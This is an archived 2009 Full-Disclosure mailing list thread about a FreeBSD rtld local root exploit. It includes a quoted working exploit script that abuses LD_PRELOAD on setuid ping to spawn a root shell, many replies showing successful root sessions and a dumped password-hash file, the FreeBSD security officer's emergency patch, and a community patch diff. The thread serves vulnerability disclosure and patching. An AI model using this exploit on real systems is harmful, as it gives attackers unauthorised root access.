Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-05 Thread RandallM
 --

 Message: 1
 Date: Fri, 4 Dec 2009 21:40:27 -0600
 From: Chris r...@operamail.com
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 To: Benji m...@b3nji.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Message-ID: 20091205034027.12bce7b...@ws5-10.us4.outblaze.com
 Content-Type: text/plain; charset=iso-8859-1

 You're as thick as that other moron.  Congrats on achieving Moron #2 status.

 I didn't say I *POSTED*  the code.  I told Moron #1 to read it.

 The two errors I highlighted were merely clues so Moron #1 could unfuck 
 himself.



 - Original Message -
 From: Benji m...@b3nji.com
 To: Chris r...@operamail.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 Date: Wed, 2 Dec 2009 14:30:09 +


 Just FYI, what you posted isn't code, but actually an error message. Just 
 FYI.



I  think it should be a mandate that morning coffee along with
exercise be done before reading mail.

-- 
been great, thanks
a.k.a System

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-04 Thread Chris
You're as thick as that other moron.  Congrats on achieving Moron #2 status.

I didn't say I *POSTED*  the code.  I told Moron #1 to read it.  

The two errors I highlighted were merely clues so Moron #1 could unfuck himself.



 - Original Message -
 From: Benji m...@b3nji.com
 To: Chris r...@operamail.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 Date: Wed, 2 Dec 2009 14:30:09 +
 
 
 Just FYI, what you posted isn't code, but actually an error message. Just FYI.
 
 On Wednesday, December 2, 2009, Chris r...@operamail.com wrote:
  r00f, you moron.  Read the fucking code.  Everything you need to 
  know is in the fucking exploit.  If you can't grasp it, you have 
  no business running it.
 
  c1: error: unrecognized command line option -fPIC
               ^^^
  gcc: program.o: No such file or directory
                    ^
 
  If you want point-and-click exploits, go back to windows.  Asshat.
 
 
  --
  ___
  Surf the Web in a faster, safer and easier way:
  Download Opera 9 at http://www.opera.com
 
  Powered by Outblaze
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 









-- 
___
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Nicolas RUFF
 Is that the Debian userland/FreeBSD kernel thingy?

I fear it is 

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC
2009 i686 i686 i386 GNU/Linux

I guess apt-get install local-r00t should work on that system :)

Regards,
- Nicolas RUFF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread McGhee, Eddie
HE HAS THE GCC INSTALLED, FJEER.


From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of r00f r00f
Sent: 01 December 2009 17:59
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday

From: Oliver Pinter oliver.pinter () gmail com
Date: Tue, 1 Dec 2009 18:28:33 +0100


On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:

I have a box with release 7.1


uname -a gives back this :

FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
GNU/Linux

and a freebsd uname -a looks like this:.

IT gives me this :

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 
i686 i386 GNU/Linux

From: FBI BOT terdlinkmobile () gmail com
Date: Tue, 1 Dec 2009 12:03:01 -0500


LOL r00f r00f didn't have gcc installed :-O

OMG What are you saying ??

I have the gcc installed my friend.. i have just compile a .c file..

and if i type gcc it returns me

gcc: No input files specified

Ok ?

Thanks!



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Chris
r00f, you moron.  Read the fucking code.  Everything you need to know is in the 
fucking exploit.  If you can't grasp it, you have no business running it.

c1: error: unrecognized command line option -fPIC
 ^^^
 gcc: program.o: No such file or directory
  ^

If you want point-and-click exploits, go back to windows.  Asshat.


-- 
___
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com

Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Benji
Just FYI, what you posted isn't code, but actually an error message. Just FYI.

On Wednesday, December 2, 2009, Chris r...@operamail.com wrote:
 r00f, you moron.  Read the fucking code.  Everything you need to know is in 
 the fucking exploit.  If you can't grasp it, you have no business running it.

c1: error: unrecognized command line option -fPIC
              ^^^
 gcc: program.o: No such file or directory
                   ^

 If you want point-and-click exploits, go back to windows.  Asshat.


 --
 ___
 Surf the Web in a faster, safer and easier way:
 Download Opera 9 at http://www.opera.com

 Powered by Outblaze

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 06.45.38 bk wrote:
 On Nov 30, 2009, at 9:25 PM, David Berard wrote:
  7.0 not vuln.
 
  7.0 vulnerable here,
 
  $ ./env
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  ALEX-ALEX
  # uname -r
  7.0-RELEASE-p3

 Here as well:

 bin/Kingcope.sh: new file: 35 lines, 772 characters.
 [ch...@demon ~]$ chmod +x bin/Kingcope.sh
 [ch...@demon ~]$ Kingcope.sh
 bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc' env.c:9: warning: incompatible implicit declaration of built-in
 function 'strcpy' env.c:11: warning: incompatible implicit declaration of
 built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt;
 missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # whoami
 root
 # uname -a
 FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24
 19:59:52 UTC 2008
 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

 It's a VM if that matters.

 --
 chort

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

with cpercivals patch:

o...@oliverp exploit ./local_root_exploit_env.sh
local_root_exploit_env.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in 
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in 
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in 
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting


-- 
thanks,
Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f
I have a box with release 7.1

uname -a gives back this :

FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
GNU/Linux

by running the exploit it gives me this error and doesn't getting rooted..I
didn't do anything to patch it ..:s and it doesn't works :p

FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
c1: error: unrecognized command line option -fPIC
gcc: program.o: No such file or directory
'cc: unrecognized option '-nostartfiles
cp: cannot stat `w00t.so.1.0': No such file or directory
test.sh: line 35: ./env: No such file or directory
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Colin Percival
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi all,

A short time ago a local root exploit was posted to the full-disclosure
mailing list; as the name suggests, this allows a local user to execute
arbitrary code as root.

Normally it is the policy of the FreeBSD Security Team to not publicly
discuss security issues until an advisory is ready, but in this case
since exploit code is already widely available I want to make a patch
available ASAP.  Due to the short timeline, it is possible that this
patch will not be the final version which is provided when an advisory
is sent out; it is even possible (although highly doubtful) that this
patch does not fully fix the issue or introduces new issues -- in short,
use at your own risk (even more than usual).

The patch is at
  http://people.freebsd.org/~cperciva/rtld.patch
and has SHA256 hash
  ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1

I expect a full security advisory concerning this issue will go out on
Wednesday December 2nd.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (FreeBSD)

iEYEARECAAYFAksUbjcACgkQFdaIBMps37LP9ACgljaYCfgVuhD2gd9Natpq4H/9
i48An1mgl+Mih+AWN7J9KZ1rsiEU31IZ
=MPXj
-END PGP SIGNATURE-

-- 
Colin Percival
Security Officer, FreeBSD | freebsd.org | The power to serve
Founder / author, Tarsnap | tarsnap.com | Online backups for the truly paranoid

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread David Berard
 The patch is at
  http://people.freebsd.org/~cperciva/rtld.patch
 

This patch doesn't work under FreeBSD 7.x due to inexistant 
unsetenv(LD_ ELF_HINTS_PATH); in rtld.c


This patch seem to fix the issue on FreeBSD 7.x

--- /usr/src/libexec/rtld-elf/rtld.c2008-11-25 03:59:29.0 +0100
+++ /usr/src/libexec/rtld-elf/rtld.c.new2009-12-01 13:09:15.0 
+0100
@@ -358,11 +358,12 @@
  * future processes to honor the potentially un-safe variables.
  */
 if (!trust) {
-unsetenv(LD_ PRELOAD);
-unsetenv(LD_ LIBMAP);
-unsetenv(LD_ LIBRARY_PATH);
-unsetenv(LD_ LIBMAP_DISABLE);
-unsetenv(LD_ DEBUG);
+   if (unsetenv(LD_ PRELOAD) || unsetenv(LD_ LIBMAP) ||
+   unsetenv(LD_ LIBRARY_PATH) || unsetenv(LD_ 
LIBMAP_DISABLE) ||
+   unsetenv(LD_ DEBUG)) {
+   _rtld_error(environment corrupt; aborting);
+   die();
+   }
 }
 ld_debug = getenv(LD_ DEBUG);
 libmap_disable = getenv(LD_ LIBMAP_DISABLE) != NULL;

Best Regards.

--
David BERARD
-
23 Boulevard MARENGO, Appartement A15
31500 TOULOUSE
contact(at)davidberard.fr
GPG|PGP KeyId 0xC8533354
GPG|PGP Key http://davidberard.fr/C8533354.gpgkey
-
*  No electrons were harmed in  *
* the transmission of this email*



PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Benji
Not to disappoint, but it doesn't look like it even compiled, might be  
the reason it didn't work.

Sent from my iPhone

On 1 Dec 2009, at 11:59, r00f r00f r00f...@gmail.com wrote:

 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386  
 GNU/Linux

 by running the exploit it gives me this error and doesn't getting  
 rooted..I didn't do anything to patch it ..:s and it doesn't works :p

 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in  
 function 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in  
 function 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in  
 function 'execl'
 c1: error: unrecognized command line option -fPIC
 gcc: program.o: No such file or directory
 'cc: unrecognized option '-nostartfiles
 cp: cannot stat `w00t.so.1.0': No such file or directory
 test.sh: line 35: ./env: No such file or directory

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Robert Portvliet
Confirmed on FreeBSD 8.0


$ uname -a
FreeBSD  8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC
2009 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
i386
$ id
uid=1001(rportvli) gid=1001(rportvli) groups=1001(rportvli)
$ ./freebsd-0day.sh
Desktop env env.c freebsd-0day.sh program.c program.o w00t.so.1.0
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(rportvli) gid=1001(rportvli) euid=0(root) groups=1001(rportvli)
#



On Mon, Nov 30, 2009 at 6:31 PM, phantomcircuit
phantomcirc...@covertinferno.org wrote:
 Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

 %sh exploit.sh
 Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o
 private program.c program.o public public_html run.sh w00t.so.1.0
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # id
 uid=1001(phantomcircuit) gid=20(staff) euid=0(root)
 groups=20(staff),0(wheel)
 # uname -a
 FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0:
 Fri Oct  2 12:21:39 UTC 2009
 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
 #

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Dawid Golunski
Confirmed on FreeBSD 7.2-RELEASE (GENERIC).

Dawid

On 30 Nov 2009, at 22:12, Kingcope wrote:

 ** FreeBSD local r00t 0day
 Discovered  Exploited by Nikolaos Rangos also known as Kingcope.
 Nov 2009 BiG TiME

 Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg

 There is an unbelievable simple local r00t bug in recent FreeBSD  
 versions.
 I audited FreeBSD for local r00t bugs a long time *sigh*. Now it  
 pays out.

 The bug resides in the Run-Time Link-Editor (rtld).
 Normally rtld does not allow dangerous environment variables like  
 LD_PRELOAD
 to be set when executing setugid binaries like ping or su.
 With a rather simple technique rtld can be tricked into
 accepting LD variables even on setugid binaries.
 See the attached exploit for details.

 Example exploiting session
 **
 %uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) groups=1001(users)
 %./w00t.sh
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in
 function 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in
 function 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
 # cat /etc/master.passwd
 # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
 kensmith Exp $
 #
 root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/ 
 bin/csh
 toor:*:0:0::0:0:Bourne-again Superuser:/root:
 daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/ 
 nologin
 operator:*:2:5::0:0:System :/:/usr/sbin/nologin
 bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
 tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
 kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
 games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
 news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
 man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
 sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25::0:0:Sendmail Submission
 User:/var/spool/clientmqueue:/usr/sbin/nologin
 mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/ 
 sbin/nologin
 bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
 proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/ 
 nologin
 _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
 _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
 uucp:*:66:66::0:0:UUCP
 pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
 pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
 www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/ 
 nologin
 kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
 :/home/kcope:/bin/sh
 #

 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN

 *EXPLOIT*

 #!/bin/sh
 echo ** FreeBSD local r00t zeroday
 echo by Kingcope
 echo November 2009
 cat  env.c  _EOF
 #include stdio.h

 main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);

execl(/sbin/ping, ping, 0);
 }
 _EOF
 gcc env.c -o env
 cat  program.c  _EOF
 #include unistd.h
 #include stdio.h
 #include sys/types.h
 #include stdlib.h

 void _init() {
extern char **environ;
environ=NULL;
system(echo ALEX-ALEX;/bin/sh);
 }
 _EOF
 gcc -o program.o -c program.c -fPIC
 gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o - 
 nostartfiles
 cp w00t.so.1.0 /tmp/w00t.so.1.0
 ./env

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: 

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread FBI BOT
LOL r00f r00f didn't have gcc installed :-O
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:
 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
 GNU/Linux

and a freebsd uname -a looks like this:

FreeBSD foobarbaz 7.2-STABLE FreeBSD 7.2-STABLE #21 r199967+31134af: Tue Dec  
1 02:54:53 CET 2009 r...@foobarbaz:/usr/obj/usr/src/sys/stable  amd64

but it's a good shot ;)



 by running the exploit it gives me this error and doesn't getting rooted..I
 didn't do anything to patch it ..:s and it doesn't works :p

 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in function
 'execl'
 c1: error: unrecognized command line option -fPIC
 gcc: program.o: No such file or directory
 'cc: unrecognized option '-nostartfiles
 cp: cannot stat `w00t.so.1.0': No such file or directory
 test.sh: line 35: ./env: No such file or directory



-- 
thanks,
Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f

 *From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 18:28:33 +0100
 --

 On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:

 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
 GNU/Linux

 and a freebsd uname -a looks like this:.


IT gives me this :

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009
i686 i686 i386 GNU/Linux

*From*: FBI BOT terdlinkmobile () gmail com
 *Date*: Tue, 1 Dec 2009 12:03:01 -0500
 --

 LOL r00f r00f didn't have gcc installed :-O


OMG What are you saying ??

I have the gcc installed my friend.. i have just compile a .c file..

and if i type gcc it returns me

gcc: No input files specified

Ok ?

Thanks!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 18.58.55 r00f r00f wrote:
  *From*: Oliver Pinter oliver.pinter () gmail com
  *Date*: Tue, 1 Dec 2009 18:28:33 +0100
  --
 
  On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:
 
  I have a box with release 7.1
 
  uname -a gives back this :
 
  FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
  GNU/Linux
 
  and a freebsd uname -a looks like this:.

 IT gives me this :

 Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009
 i686 i686 i386 GNU/Linux

and what is your: 
sysctl kern.osreldate ?


 *From*: FBI BOT terdlinkmobile () gmail com

  *Date*: Tue, 1 Dec 2009 12:03:01 -0500
  --
 
  LOL r00f r00f didn't have gcc installed :-O

 OMG What are you saying ??

 I have the gcc installed my friend.. i have just compile a .c file..

 and if i type gcc it returns me

 gcc: No input files specified

 Ok ?

 Thanks!



-- 
thanks,
Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f
*From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 19:13:55 +0100
 --

and what is your:
sysctl kern.osreldate ?


Here it is!

kern.osreldate: 701000
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread bk


On Dec 1, 2009, at 10:33 AM, r00f r00f wrote:

 
 
 From: Oliver Pinter oliver.pinter () gmail com
 Date: Tue, 1 Dec 2009 19:13:55 +0100
 and what is your: 
 sysctl kern.osreldate ?
 
 Here it is!
 kern.osreldate: 701000 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


Is that the Debian userland/FreeBSD kernel thingy?

--
chort___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Benji
I think we're missing the point here. The exploit didnt compile due to
his/her copy of gcc which apparently doesnt understand -fPIC
c1: error: unrecognized command line option -fPIC. Thus, obviously,
there's no chance it was ever going to work.

On Tue, Dec 1, 2009 at 7:47 PM, bk cho...@gmail.com wrote:



 On Dec 1, 2009, at 10:33 AM, r00f r00f wrote:



 *From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 19:13:55 +0100
 --

 and what is your:
 sysctl kern.osreldate ?


 Here it is!

 kern.osreldate: 701000 ___

 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 Is that the Debian userland/FreeBSD kernel thingy?

 --
 chort

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Michał Manterys
http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071689.html

$ uname -a
FreeBSD serev1.domena.pl 7.2-STABLE FreeBSD 7.2-STABLE #1: Tue Dec  1
19:42:43 CET 2009 r...@server1.domena.pl:/usr/src/sys/i386/compile/kern1
i386
$ ./test.sh
env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#id -a
uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user)

Install patch:
cd /usr/src/libexec/rtld-elf
fetch http://wojciech.sychut.eu/rtld.patch
patch  rtld.patch
make clean
make
make install


and:

$ ./test.sh
env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
